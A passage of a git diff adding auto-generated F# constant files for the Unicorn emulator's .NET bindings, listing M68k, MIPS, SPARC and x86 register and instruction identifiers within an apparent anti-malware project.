UC_PROT_WRITE = 2 + let UC_PROT_EXEC = 4 + let UC_PROT_ALL = 7 + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/M68k.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/M68k.fs new file mode 100644 index 0000000..8fc5157 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/M68k.fs @@ -0,0 +1,32 @@ +// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT + +namespace UnicornManaged.Const + +open System + +[] +module M68k = + + // M68K registers + + let UC_M68K_REG_INVALID = 0 + let UC_M68K_REG_A0 = 1 + let UC_M68K_REG_A1 = 2 + let UC_M68K_REG_A2 = 3 + let UC_M68K_REG_A3 = 4 + let UC_M68K_REG_A4 = 5 + let UC_M68K_REG_A5 = 6 + let UC_M68K_REG_A6 = 7 + let UC_M68K_REG_A7 = 8 + let UC_M68K_REG_D0 = 9 + let UC_M68K_REG_D1 = 10 + let UC_M68K_REG_D2 = 11 + let UC_M68K_REG_D3 = 12 + let UC_M68K_REG_D4 = 13 + let UC_M68K_REG_D5 = 14 + let UC_M68K_REG_D6 = 15 + let UC_M68K_REG_D7 = 16 + let UC_M68K_REG_SR = 17 + let UC_M68K_REG_PC = 18 + let UC_M68K_REG_ENDING = 19 + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Mips.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Mips.fs new file mode 100644 index 0000000..2428202 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Mips.fs @@ -0,0 +1,205 @@ +// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT + +namespace UnicornManaged.Const + +open System + +[] +module Mips = + + // MIPS registers + + let UC_MIPS_REG_INVALID = 0 + + // General purpose registers + let UC_MIPS_REG_PC = 1 + let UC_MIPS_REG_0 = 2 + let UC_MIPS_REG_1 = 3 + let UC_MIPS_REG_2 = 4 + let UC_MIPS_REG_3 = 5 + let UC_MIPS_REG_4 = 6 + let UC_MIPS_REG_5 = 7 + let UC_MIPS_REG_6 = 8 + let UC_MIPS_REG_7 = 9 + let UC_MIPS_REG_8 = 10 + let UC_MIPS_REG_9 = 11 + let UC_MIPS_REG_10 = 12 + let UC_MIPS_REG_11 = 13 + let UC_MIPS_REG_12 = 14 + let UC_MIPS_REG_13 = 15 + let UC_MIPS_REG_14 = 16 + let UC_MIPS_REG_15 = 17 + let UC_MIPS_REG_16 = 18 + let UC_MIPS_REG_17 = 19 + let UC_MIPS_REG_18 = 20 + let UC_MIPS_REG_19 = 21 + let UC_MIPS_REG_20 = 22 + let UC_MIPS_REG_21 = 23 + let UC_MIPS_REG_22 = 24 + let UC_MIPS_REG_23 = 25 + let UC_MIPS_REG_24 = 26 + let UC_MIPS_REG_25 = 27 + let UC_MIPS_REG_26 = 28 + let UC_MIPS_REG_27 = 29 + let UC_MIPS_REG_28 = 30 + let UC_MIPS_REG_29 = 31 + let UC_MIPS_REG_30 = 32 + let UC_MIPS_REG_31 = 33 + + // DSP registers + let UC_MIPS_REG_DSPCCOND = 34 + let UC_MIPS_REG_DSPCARRY = 35 + let UC_MIPS_REG_DSPEFI = 36 + let UC_MIPS_REG_DSPOUTFLAG = 37 + let UC_MIPS_REG_DSPOUTFLAG16_19 = 38 + let UC_MIPS_REG_DSPOUTFLAG20 = 39 + let UC_MIPS_REG_DSPOUTFLAG21 = 40 + let UC_MIPS_REG_DSPOUTFLAG22 = 41 + let UC_MIPS_REG_DSPOUTFLAG23 = 42 + let UC_MIPS_REG_DSPPOS = 43 + let UC_MIPS_REG_DSPSCOUNT = 44 + + // ACC registers + let UC_MIPS_REG_AC0 = 45 + let UC_MIPS_REG_AC1 = 46 + let UC_MIPS_REG_AC2 = 47 + let UC_MIPS_REG_AC3 = 48 + + // COP registers + let UC_MIPS_REG_CC0 = 49 + let UC_MIPS_REG_CC1 = 50 + let UC_MIPS_REG_CC2 = 51 + let UC_MIPS_REG_CC3 = 52 + let UC_MIPS_REG_CC4 = 53 + let UC_MIPS_REG_CC5 = 54 + let UC_MIPS_REG_CC6 = 55 + let UC_MIPS_REG_CC7 = 56 + + // FPU registers + let UC_MIPS_REG_F0 = 57 + let UC_MIPS_REG_F1 = 58 + let UC_MIPS_REG_F2 = 59 + let UC_MIPS_REG_F3 = 60 + let UC_MIPS_REG_F4 = 61 + let UC_MIPS_REG_F5 = 62 + let UC_MIPS_REG_F6 = 63 + let 
UC_MIPS_REG_F7 = 64 + let UC_MIPS_REG_F8 = 65 + let UC_MIPS_REG_F9 = 66 + let UC_MIPS_REG_F10 = 67 + let UC_MIPS_REG_F11 = 68 + let UC_MIPS_REG_F12 = 69 + let UC_MIPS_REG_F13 = 70 + let UC_MIPS_REG_F14 = 71 + let UC_MIPS_REG_F15 = 72 + let UC_MIPS_REG_F16 = 73 + let UC_MIPS_REG_F17 = 74 + let UC_MIPS_REG_F18 = 75 + let UC_MIPS_REG_F19 = 76 + let UC_MIPS_REG_F20 = 77 + let UC_MIPS_REG_F21 = 78 + let UC_MIPS_REG_F22 = 79 + let UC_MIPS_REG_F23 = 80 + let UC_MIPS_REG_F24 = 81 + let UC_MIPS_REG_F25 = 82 + let UC_MIPS_REG_F26 = 83 + let UC_MIPS_REG_F27 = 84 + let UC_MIPS_REG_F28 = 85 + let UC_MIPS_REG_F29 = 86 + let UC_MIPS_REG_F30 = 87 + let UC_MIPS_REG_F31 = 88 + let UC_MIPS_REG_FCC0 = 89 + let UC_MIPS_REG_FCC1 = 90 + let UC_MIPS_REG_FCC2 = 91 + let UC_MIPS_REG_FCC3 = 92 + let UC_MIPS_REG_FCC4 = 93 + let UC_MIPS_REG_FCC5 = 94 + let UC_MIPS_REG_FCC6 = 95 + let UC_MIPS_REG_FCC7 = 96 + + // AFPR128 + let UC_MIPS_REG_W0 = 97 + let UC_MIPS_REG_W1 = 98 + let UC_MIPS_REG_W2 = 99 + let UC_MIPS_REG_W3 = 100 + let UC_MIPS_REG_W4 = 101 + let UC_MIPS_REG_W5 = 102 + let UC_MIPS_REG_W6 = 103 + let UC_MIPS_REG_W7 = 104 + let UC_MIPS_REG_W8 = 105 + let UC_MIPS_REG_W9 = 106 + let UC_MIPS_REG_W10 = 107 + let UC_MIPS_REG_W11 = 108 + let UC_MIPS_REG_W12 = 109 + let UC_MIPS_REG_W13 = 110 + let UC_MIPS_REG_W14 = 111 + let UC_MIPS_REG_W15 = 112 + let UC_MIPS_REG_W16 = 113 + let UC_MIPS_REG_W17 = 114 + let UC_MIPS_REG_W18 = 115 + let UC_MIPS_REG_W19 = 116 + let UC_MIPS_REG_W20 = 117 + let UC_MIPS_REG_W21 = 118 + let UC_MIPS_REG_W22 = 119 + let UC_MIPS_REG_W23 = 120 + let UC_MIPS_REG_W24 = 121 + let UC_MIPS_REG_W25 = 122 + let UC_MIPS_REG_W26 = 123 + let UC_MIPS_REG_W27 = 124 + let UC_MIPS_REG_W28 = 125 + let UC_MIPS_REG_W29 = 126 + let UC_MIPS_REG_W30 = 127 + let UC_MIPS_REG_W31 = 128 + let UC_MIPS_REG_HI = 129 + let UC_MIPS_REG_LO = 130 + let UC_MIPS_REG_P0 = 131 + let UC_MIPS_REG_P1 = 132 + let UC_MIPS_REG_P2 = 133 + let UC_MIPS_REG_MPL0 = 134 + let UC_MIPS_REG_MPL1 = 135 + let 
UC_MIPS_REG_MPL2 = 136 + let UC_MIPS_REG_CP0_CONFIG3 = 137 + let UC_MIPS_REG_CP0_USERLOCAL = 138 + let UC_MIPS_REG_ENDING = 139 + let UC_MIPS_REG_ZERO = 2 + let UC_MIPS_REG_AT = 3 + let UC_MIPS_REG_V0 = 4 + let UC_MIPS_REG_V1 = 5 + let UC_MIPS_REG_A0 = 6 + let UC_MIPS_REG_A1 = 7 + let UC_MIPS_REG_A2 = 8 + let UC_MIPS_REG_A3 = 9 + let UC_MIPS_REG_T0 = 10 + let UC_MIPS_REG_T1 = 11 + let UC_MIPS_REG_T2 = 12 + let UC_MIPS_REG_T3 = 13 + let UC_MIPS_REG_T4 = 14 + let UC_MIPS_REG_T5 = 15 + let UC_MIPS_REG_T6 = 16 + let UC_MIPS_REG_T7 = 17 + let UC_MIPS_REG_S0 = 18 + let UC_MIPS_REG_S1 = 19 + let UC_MIPS_REG_S2 = 20 + let UC_MIPS_REG_S3 = 21 + let UC_MIPS_REG_S4 = 22 + let UC_MIPS_REG_S5 = 23 + let UC_MIPS_REG_S6 = 24 + let UC_MIPS_REG_S7 = 25 + let UC_MIPS_REG_T8 = 26 + let UC_MIPS_REG_T9 = 27 + let UC_MIPS_REG_K0 = 28 + let UC_MIPS_REG_K1 = 29 + let UC_MIPS_REG_GP = 30 + let UC_MIPS_REG_SP = 31 + let UC_MIPS_REG_FP = 32 + let UC_MIPS_REG_S8 = 32 + let UC_MIPS_REG_RA = 33 + let UC_MIPS_REG_HI0 = 45 + let UC_MIPS_REG_HI1 = 46 + let UC_MIPS_REG_HI2 = 47 + let UC_MIPS_REG_HI3 = 48 + let UC_MIPS_REG_LO0 = 45 + let UC_MIPS_REG_LO1 = 46 + let UC_MIPS_REG_LO2 = 47 + let UC_MIPS_REG_LO3 = 48 + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Sparc.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Sparc.fs new file mode 100644 index 0000000..9a91e1a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Sparc.fs @@ -0,0 +1,104 @@ +// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT + +namespace UnicornManaged.Const + +open System + +[] +module Sparc = + + // SPARC registers + + let UC_SPARC_REG_INVALID = 0 + let UC_SPARC_REG_F0 = 1 + let UC_SPARC_REG_F1 = 2 + let UC_SPARC_REG_F2 = 3 + let UC_SPARC_REG_F3 = 4 + let UC_SPARC_REG_F4 = 5 + let UC_SPARC_REG_F5 = 6 + let UC_SPARC_REG_F6 = 7 + let UC_SPARC_REG_F7 = 8 + let UC_SPARC_REG_F8 = 9 + let UC_SPARC_REG_F9 = 10 + let UC_SPARC_REG_F10 = 11 + let UC_SPARC_REG_F11 = 12 + let UC_SPARC_REG_F12 = 13 + let UC_SPARC_REG_F13 = 14 + let UC_SPARC_REG_F14 = 15 + let UC_SPARC_REG_F15 = 16 + let UC_SPARC_REG_F16 = 17 + let UC_SPARC_REG_F17 = 18 + let UC_SPARC_REG_F18 = 19 + let UC_SPARC_REG_F19 = 20 + let UC_SPARC_REG_F20 = 21 + let UC_SPARC_REG_F21 = 22 + let UC_SPARC_REG_F22 = 23 + let UC_SPARC_REG_F23 = 24 + let UC_SPARC_REG_F24 = 25 + let UC_SPARC_REG_F25 = 26 + let UC_SPARC_REG_F26 = 27 + let UC_SPARC_REG_F27 = 28 + let UC_SPARC_REG_F28 = 29 + let UC_SPARC_REG_F29 = 30 + let UC_SPARC_REG_F30 = 31 + let UC_SPARC_REG_F31 = 32 + let UC_SPARC_REG_F32 = 33 + let UC_SPARC_REG_F34 = 34 + let UC_SPARC_REG_F36 = 35 + let UC_SPARC_REG_F38 = 36 + let UC_SPARC_REG_F40 = 37 + let UC_SPARC_REG_F42 = 38 + let UC_SPARC_REG_F44 = 39 + let UC_SPARC_REG_F46 = 40 + let UC_SPARC_REG_F48 = 41 + let UC_SPARC_REG_F50 = 42 + let UC_SPARC_REG_F52 = 43 + let UC_SPARC_REG_F54 = 44 + let UC_SPARC_REG_F56 = 45 + let UC_SPARC_REG_F58 = 46 + let UC_SPARC_REG_F60 = 47 + let UC_SPARC_REG_F62 = 48 + let UC_SPARC_REG_FCC0 = 49 + let UC_SPARC_REG_FCC1 = 50 + let UC_SPARC_REG_FCC2 = 51 + let UC_SPARC_REG_FCC3 = 52 + let UC_SPARC_REG_G0 = 53 + let UC_SPARC_REG_G1 = 54 + let UC_SPARC_REG_G2 = 55 + let UC_SPARC_REG_G3 = 56 + let UC_SPARC_REG_G4 = 57 + let UC_SPARC_REG_G5 = 58 + let UC_SPARC_REG_G6 = 59 + let UC_SPARC_REG_G7 = 60 + let UC_SPARC_REG_I0 = 61 + let UC_SPARC_REG_I1 = 62 + let UC_SPARC_REG_I2 = 63 + let UC_SPARC_REG_I3 = 64 + let UC_SPARC_REG_I4 = 65 + let UC_SPARC_REG_I5 = 66 + let 
UC_SPARC_REG_FP = 67 + let UC_SPARC_REG_I7 = 68 + let UC_SPARC_REG_ICC = 69 + let UC_SPARC_REG_L0 = 70 + let UC_SPARC_REG_L1 = 71 + let UC_SPARC_REG_L2 = 72 + let UC_SPARC_REG_L3 = 73 + let UC_SPARC_REG_L4 = 74 + let UC_SPARC_REG_L5 = 75 + let UC_SPARC_REG_L6 = 76 + let UC_SPARC_REG_L7 = 77 + let UC_SPARC_REG_O0 = 78 + let UC_SPARC_REG_O1 = 79 + let UC_SPARC_REG_O2 = 80 + let UC_SPARC_REG_O3 = 81 + let UC_SPARC_REG_O4 = 82 + let UC_SPARC_REG_O5 = 83 + let UC_SPARC_REG_SP = 84 + let UC_SPARC_REG_O7 = 85 + let UC_SPARC_REG_Y = 86 + let UC_SPARC_REG_XCC = 87 + let UC_SPARC_REG_PC = 88 + let UC_SPARC_REG_ENDING = 89 + let UC_SPARC_REG_O6 = 84 + let UC_SPARC_REG_I6 = 67 + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/X86.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/X86.fs new file mode 100644 index 0000000..ad16a84 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/X86.fs @@ -0,0 +1,1607 @@ +// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT + +namespace UnicornManaged.Const + +open System + +[] +module X86 = + + // X86 registers + + let UC_X86_REG_INVALID = 0 + let UC_X86_REG_AH = 1 + let UC_X86_REG_AL = 2 + let UC_X86_REG_AX = 3 + let UC_X86_REG_BH = 4 + let UC_X86_REG_BL = 5 + let UC_X86_REG_BP = 6 + let UC_X86_REG_BPL = 7 + let UC_X86_REG_BX = 8 + let UC_X86_REG_CH = 9 + let UC_X86_REG_CL = 10 + let UC_X86_REG_CS = 11 + let UC_X86_REG_CX = 12 + let UC_X86_REG_DH = 13 + let UC_X86_REG_DI = 14 + let UC_X86_REG_DIL = 15 + let UC_X86_REG_DL = 16 + let UC_X86_REG_DS = 17 + let UC_X86_REG_DX = 18 + let UC_X86_REG_EAX = 19 + let UC_X86_REG_EBP = 20 + let UC_X86_REG_EBX = 21 + let UC_X86_REG_ECX = 22 + let UC_X86_REG_EDI = 23 + let UC_X86_REG_EDX = 24 + let UC_X86_REG_EFLAGS = 25 + let UC_X86_REG_EIP = 26 + let UC_X86_REG_EIZ = 27 + let UC_X86_REG_ES = 28 + let UC_X86_REG_ESI = 29 + let UC_X86_REG_ESP = 30 + let UC_X86_REG_FPSW = 31 + let UC_X86_REG_FS = 32 + let UC_X86_REG_GS = 33 + let UC_X86_REG_IP = 34 + let UC_X86_REG_RAX = 35 + let UC_X86_REG_RBP = 36 + let UC_X86_REG_RBX = 37 + let UC_X86_REG_RCX = 38 + let UC_X86_REG_RDI = 39 + let UC_X86_REG_RDX = 40 + let UC_X86_REG_RIP = 41 + let UC_X86_REG_RIZ = 42 + let UC_X86_REG_RSI = 43 + let UC_X86_REG_RSP = 44 + let UC_X86_REG_SI = 45 + let UC_X86_REG_SIL = 46 + let UC_X86_REG_SP = 47 + let UC_X86_REG_SPL = 48 + let UC_X86_REG_SS = 49 + let UC_X86_REG_CR0 = 50 + let UC_X86_REG_CR1 = 51 + let UC_X86_REG_CR2 = 52 + let UC_X86_REG_CR3 = 53 + let UC_X86_REG_CR4 = 54 + let UC_X86_REG_CR5 = 55 + let UC_X86_REG_CR6 = 56 + let UC_X86_REG_CR7 = 57 + let UC_X86_REG_CR8 = 58 + let UC_X86_REG_CR9 = 59 + let UC_X86_REG_CR10 = 60 + let UC_X86_REG_CR11 = 61 + let UC_X86_REG_CR12 = 62 + let UC_X86_REG_CR13 = 63 + let UC_X86_REG_CR14 = 64 + let UC_X86_REG_CR15 = 65 + let UC_X86_REG_DR0 = 66 + let UC_X86_REG_DR1 = 67 + let UC_X86_REG_DR2 = 68 + let UC_X86_REG_DR3 = 69 + let UC_X86_REG_DR4 = 70 + let UC_X86_REG_DR5 = 71 + let UC_X86_REG_DR6 
= 72 + let UC_X86_REG_DR7 = 73 + let UC_X86_REG_DR8 = 74 + let UC_X86_REG_DR9 = 75 + let UC_X86_REG_DR10 = 76 + let UC_X86_REG_DR11 = 77 + let UC_X86_REG_DR12 = 78 + let UC_X86_REG_DR13 = 79 + let UC_X86_REG_DR14 = 80 + let UC_X86_REG_DR15 = 81 + let UC_X86_REG_FP0 = 82 + let UC_X86_REG_FP1 = 83 + let UC_X86_REG_FP2 = 84 + let UC_X86_REG_FP3 = 85 + let UC_X86_REG_FP4 = 86 + let UC_X86_REG_FP5 = 87 + let UC_X86_REG_FP6 = 88 + let UC_X86_REG_FP7 = 89 + let UC_X86_REG_K0 = 90 + let UC_X86_REG_K1 = 91 + let UC_X86_REG_K2 = 92 + let UC_X86_REG_K3 = 93 + let UC_X86_REG_K4 = 94 + let UC_X86_REG_K5 = 95 + let UC_X86_REG_K6 = 96 + let UC_X86_REG_K7 = 97 + let UC_X86_REG_MM0 = 98 + let UC_X86_REG_MM1 = 99 + let UC_X86_REG_MM2 = 100 + let UC_X86_REG_MM3 = 101 + let UC_X86_REG_MM4 = 102 + let UC_X86_REG_MM5 = 103 + let UC_X86_REG_MM6 = 104 + let UC_X86_REG_MM7 = 105 + let UC_X86_REG_R8 = 106 + let UC_X86_REG_R9 = 107 + let UC_X86_REG_R10 = 108 + let UC_X86_REG_R11 = 109 + let UC_X86_REG_R12 = 110 + let UC_X86_REG_R13 = 111 + let UC_X86_REG_R14 = 112 + let UC_X86_REG_R15 = 113 + let UC_X86_REG_ST0 = 114 + let UC_X86_REG_ST1 = 115 + let UC_X86_REG_ST2 = 116 + let UC_X86_REG_ST3 = 117 + let UC_X86_REG_ST4 = 118 + let UC_X86_REG_ST5 = 119 + let UC_X86_REG_ST6 = 120 + let UC_X86_REG_ST7 = 121 + let UC_X86_REG_XMM0 = 122 + let UC_X86_REG_XMM1 = 123 + let UC_X86_REG_XMM2 = 124 + let UC_X86_REG_XMM3 = 125 + let UC_X86_REG_XMM4 = 126 + let UC_X86_REG_XMM5 = 127 + let UC_X86_REG_XMM6 = 128 + let UC_X86_REG_XMM7 = 129 + let UC_X86_REG_XMM8 = 130 + let UC_X86_REG_XMM9 = 131 + let UC_X86_REG_XMM10 = 132 + let UC_X86_REG_XMM11 = 133 + let UC_X86_REG_XMM12 = 134 + let UC_X86_REG_XMM13 = 135 + let UC_X86_REG_XMM14 = 136 + let UC_X86_REG_XMM15 = 137 + let UC_X86_REG_XMM16 = 138 + let UC_X86_REG_XMM17 = 139 + let UC_X86_REG_XMM18 = 140 + let UC_X86_REG_XMM19 = 141 + let UC_X86_REG_XMM20 = 142 + let UC_X86_REG_XMM21 = 143 + let UC_X86_REG_XMM22 = 144 + let UC_X86_REG_XMM23 = 145 + let 
UC_X86_REG_XMM24 = 146 + let UC_X86_REG_XMM25 = 147 + let UC_X86_REG_XMM26 = 148 + let UC_X86_REG_XMM27 = 149 + let UC_X86_REG_XMM28 = 150 + let UC_X86_REG_XMM29 = 151 + let UC_X86_REG_XMM30 = 152 + let UC_X86_REG_XMM31 = 153 + let UC_X86_REG_YMM0 = 154 + let UC_X86_REG_YMM1 = 155 + let UC_X86_REG_YMM2 = 156 + let UC_X86_REG_YMM3 = 157 + let UC_X86_REG_YMM4 = 158 + let UC_X86_REG_YMM5 = 159 + let UC_X86_REG_YMM6 = 160 + let UC_X86_REG_YMM7 = 161 + let UC_X86_REG_YMM8 = 162 + let UC_X86_REG_YMM9 = 163 + let UC_X86_REG_YMM10 = 164 + let UC_X86_REG_YMM11 = 165 + let UC_X86_REG_YMM12 = 166 + let UC_X86_REG_YMM13 = 167 + let UC_X86_REG_YMM14 = 168 + let UC_X86_REG_YMM15 = 169 + let UC_X86_REG_YMM16 = 170 + let UC_X86_REG_YMM17 = 171 + let UC_X86_REG_YMM18 = 172 + let UC_X86_REG_YMM19 = 173 + let UC_X86_REG_YMM20 = 174 + let UC_X86_REG_YMM21 = 175 + let UC_X86_REG_YMM22 = 176 + let UC_X86_REG_YMM23 = 177 + let UC_X86_REG_YMM24 = 178 + let UC_X86_REG_YMM25 = 179 + let UC_X86_REG_YMM26 = 180 + let UC_X86_REG_YMM27 = 181 + let UC_X86_REG_YMM28 = 182 + let UC_X86_REG_YMM29 = 183 + let UC_X86_REG_YMM30 = 184 + let UC_X86_REG_YMM31 = 185 + let UC_X86_REG_ZMM0 = 186 + let UC_X86_REG_ZMM1 = 187 + let UC_X86_REG_ZMM2 = 188 + let UC_X86_REG_ZMM3 = 189 + let UC_X86_REG_ZMM4 = 190 + let UC_X86_REG_ZMM5 = 191 + let UC_X86_REG_ZMM6 = 192 + let UC_X86_REG_ZMM7 = 193 + let UC_X86_REG_ZMM8 = 194 + let UC_X86_REG_ZMM9 = 195 + let UC_X86_REG_ZMM10 = 196 + let UC_X86_REG_ZMM11 = 197 + let UC_X86_REG_ZMM12 = 198 + let UC_X86_REG_ZMM13 = 199 + let UC_X86_REG_ZMM14 = 200 + let UC_X86_REG_ZMM15 = 201 + let UC_X86_REG_ZMM16 = 202 + let UC_X86_REG_ZMM17 = 203 + let UC_X86_REG_ZMM18 = 204 + let UC_X86_REG_ZMM19 = 205 + let UC_X86_REG_ZMM20 = 206 + let UC_X86_REG_ZMM21 = 207 + let UC_X86_REG_ZMM22 = 208 + let UC_X86_REG_ZMM23 = 209 + let UC_X86_REG_ZMM24 = 210 + let UC_X86_REG_ZMM25 = 211 + let UC_X86_REG_ZMM26 = 212 + let UC_X86_REG_ZMM27 = 213 + let UC_X86_REG_ZMM28 = 214 + let UC_X86_REG_ZMM29 = 
215 + let UC_X86_REG_ZMM30 = 216 + let UC_X86_REG_ZMM31 = 217 + let UC_X86_REG_R8B = 218 + let UC_X86_REG_R9B = 219 + let UC_X86_REG_R10B = 220 + let UC_X86_REG_R11B = 221 + let UC_X86_REG_R12B = 222 + let UC_X86_REG_R13B = 223 + let UC_X86_REG_R14B = 224 + let UC_X86_REG_R15B = 225 + let UC_X86_REG_R8D = 226 + let UC_X86_REG_R9D = 227 + let UC_X86_REG_R10D = 228 + let UC_X86_REG_R11D = 229 + let UC_X86_REG_R12D = 230 + let UC_X86_REG_R13D = 231 + let UC_X86_REG_R14D = 232 + let UC_X86_REG_R15D = 233 + let UC_X86_REG_R8W = 234 + let UC_X86_REG_R9W = 235 + let UC_X86_REG_R10W = 236 + let UC_X86_REG_R11W = 237 + let UC_X86_REG_R12W = 238 + let UC_X86_REG_R13W = 239 + let UC_X86_REG_R14W = 240 + let UC_X86_REG_R15W = 241 + let UC_X86_REG_IDTR = 242 + let UC_X86_REG_GDTR = 243 + let UC_X86_REG_LDTR = 244 + let UC_X86_REG_TR = 245 + let UC_X86_REG_FPCW = 246 + let UC_X86_REG_FPTAG = 247 + let UC_X86_REG_MSR = 248 + let UC_X86_REG_MXCSR = 249 + let UC_X86_REG_FS_BASE = 250 + let UC_X86_REG_GS_BASE = 251 + let UC_X86_REG_ENDING = 252 + + // X86 instructions + + let UC_X86_INS_INVALID = 0 + let UC_X86_INS_AAA = 1 + let UC_X86_INS_AAD = 2 + let UC_X86_INS_AAM = 3 + let UC_X86_INS_AAS = 4 + let UC_X86_INS_FABS = 5 + let UC_X86_INS_ADC = 6 + let UC_X86_INS_ADCX = 7 + let UC_X86_INS_ADD = 8 + let UC_X86_INS_ADDPD = 9 + let UC_X86_INS_ADDPS = 10 + let UC_X86_INS_ADDSD = 11 + let UC_X86_INS_ADDSS = 12 + let UC_X86_INS_ADDSUBPD = 13 + let UC_X86_INS_ADDSUBPS = 14 + let UC_X86_INS_FADD = 15 + let UC_X86_INS_FIADD = 16 + let UC_X86_INS_FADDP = 17 + let UC_X86_INS_ADOX = 18 + let UC_X86_INS_AESDECLAST = 19 + let UC_X86_INS_AESDEC = 20 + let UC_X86_INS_AESENCLAST = 21 + let UC_X86_INS_AESENC = 22 + let UC_X86_INS_AESIMC = 23 + let UC_X86_INS_AESKEYGENASSIST = 24 + let UC_X86_INS_AND = 25 + let UC_X86_INS_ANDN = 26 + let UC_X86_INS_ANDNPD = 27 + let UC_X86_INS_ANDNPS = 28 + let UC_X86_INS_ANDPD = 29 + let UC_X86_INS_ANDPS = 30 + let UC_X86_INS_ARPL = 31 + let UC_X86_INS_BEXTR = 32 + 
let UC_X86_INS_BLCFILL = 33 + let UC_X86_INS_BLCI = 34 + let UC_X86_INS_BLCIC = 35 + let UC_X86_INS_BLCMSK = 36 + let UC_X86_INS_BLCS = 37 + let UC_X86_INS_BLENDPD = 38 + let UC_X86_INS_BLENDPS = 39 + let UC_X86_INS_BLENDVPD = 40 + let UC_X86_INS_BLENDVPS = 41 + let UC_X86_INS_BLSFILL = 42 + let UC_X86_INS_BLSI = 43 + let UC_X86_INS_BLSIC = 44 + let UC_X86_INS_BLSMSK = 45 + let UC_X86_INS_BLSR = 46 + let UC_X86_INS_BOUND = 47 + let UC_X86_INS_BSF = 48 + let UC_X86_INS_BSR = 49 + let UC_X86_INS_BSWAP = 50 + let UC_X86_INS_BT = 51 + let UC_X86_INS_BTC = 52 + let UC_X86_INS_BTR = 53 + let UC_X86_INS_BTS = 54 + let UC_X86_INS_BZHI = 55 + let UC_X86_INS_CALL = 56 + let UC_X86_INS_CBW = 57 + let UC_X86_INS_CDQ = 58 + let UC_X86_INS_CDQE = 59 + let UC_X86_INS_FCHS = 60 + let UC_X86_INS_CLAC = 61 + let UC_X86_INS_CLC = 62 + let UC_X86_INS_CLD = 63 + let UC_X86_INS_CLFLUSH = 64 + let UC_X86_INS_CLFLUSHOPT = 65 + let UC_X86_INS_CLGI = 66 + let UC_X86_INS_CLI = 67 + let UC_X86_INS_CLTS = 68 + let UC_X86_INS_CLWB = 69 + let UC_X86_INS_CMC = 70 + let UC_X86_INS_CMOVA = 71 + let UC_X86_INS_CMOVAE = 72 + let UC_X86_INS_CMOVB = 73 + let UC_X86_INS_CMOVBE = 74 + let UC_X86_INS_FCMOVBE = 75 + let UC_X86_INS_FCMOVB = 76 + let UC_X86_INS_CMOVE = 77 + let UC_X86_INS_FCMOVE = 78 + let UC_X86_INS_CMOVG = 79 + let UC_X86_INS_CMOVGE = 80 + let UC_X86_INS_CMOVL = 81 + let UC_X86_INS_CMOVLE = 82 + let UC_X86_INS_FCMOVNBE = 83 + let UC_X86_INS_FCMOVNB = 84 + let UC_X86_INS_CMOVNE = 85 + let UC_X86_INS_FCMOVNE = 86 + let UC_X86_INS_CMOVNO = 87 + let UC_X86_INS_CMOVNP = 88 + let UC_X86_INS_FCMOVNU = 89 + let UC_X86_INS_CMOVNS = 90 + let UC_X86_INS_CMOVO = 91 + let UC_X86_INS_CMOVP = 92 + let UC_X86_INS_FCMOVU = 93 + let UC_X86_INS_CMOVS = 94 + let UC_X86_INS_CMP = 95 + let UC_X86_INS_CMPPD = 96 + let UC_X86_INS_CMPPS = 97 + let UC_X86_INS_CMPSB = 98 + let UC_X86_INS_CMPSD = 99 + let UC_X86_INS_CMPSQ = 100 + let UC_X86_INS_CMPSS = 101 + let UC_X86_INS_CMPSW = 102 + let UC_X86_INS_CMPXCHG16B = 
103 + let UC_X86_INS_CMPXCHG = 104 + let UC_X86_INS_CMPXCHG8B = 105 + let UC_X86_INS_COMISD = 106 + let UC_X86_INS_COMISS = 107 + let UC_X86_INS_FCOMP = 108 + let UC_X86_INS_FCOMPI = 109 + let UC_X86_INS_FCOMI = 110 + let UC_X86_INS_FCOM = 111 + let UC_X86_INS_FCOS = 112 + let UC_X86_INS_CPUID = 113 + let UC_X86_INS_CQO = 114 + let UC_X86_INS_CRC32 = 115 + let UC_X86_INS_CVTDQ2PD = 116 + let UC_X86_INS_CVTDQ2PS = 117 + let UC_X86_INS_CVTPD2DQ = 118 + let UC_X86_INS_CVTPD2PS = 119 + let UC_X86_INS_CVTPS2DQ = 120 + let UC_X86_INS_CVTPS2PD = 121 + let UC_X86_INS_CVTSD2SI = 122 + let UC_X86_INS_CVTSD2SS = 123 + let UC_X86_INS_CVTSI2SD = 124 + let UC_X86_INS_CVTSI2SS = 125 + let UC_X86_INS_CVTSS2SD = 126 + let UC_X86_INS_CVTSS2SI = 127 + let UC_X86_INS_CVTTPD2DQ = 128 + let UC_X86_INS_CVTTPS2DQ = 129 + let UC_X86_INS_CVTTSD2SI = 130 + let UC_X86_INS_CVTTSS2SI = 131 + let UC_X86_INS_CWD = 132 + let UC_X86_INS_CWDE = 133 + let UC_X86_INS_DAA = 134 + let UC_X86_INS_DAS = 135 + let UC_X86_INS_DATA16 = 136 + let UC_X86_INS_DEC = 137 + let UC_X86_INS_DIV = 138 + let UC_X86_INS_DIVPD = 139 + let UC_X86_INS_DIVPS = 140 + let UC_X86_INS_FDIVR = 141 + let UC_X86_INS_FIDIVR = 142 + let UC_X86_INS_FDIVRP = 143 + let UC_X86_INS_DIVSD = 144 + let UC_X86_INS_DIVSS = 145 + let UC_X86_INS_FDIV = 146 + let UC_X86_INS_FIDIV = 147 + let 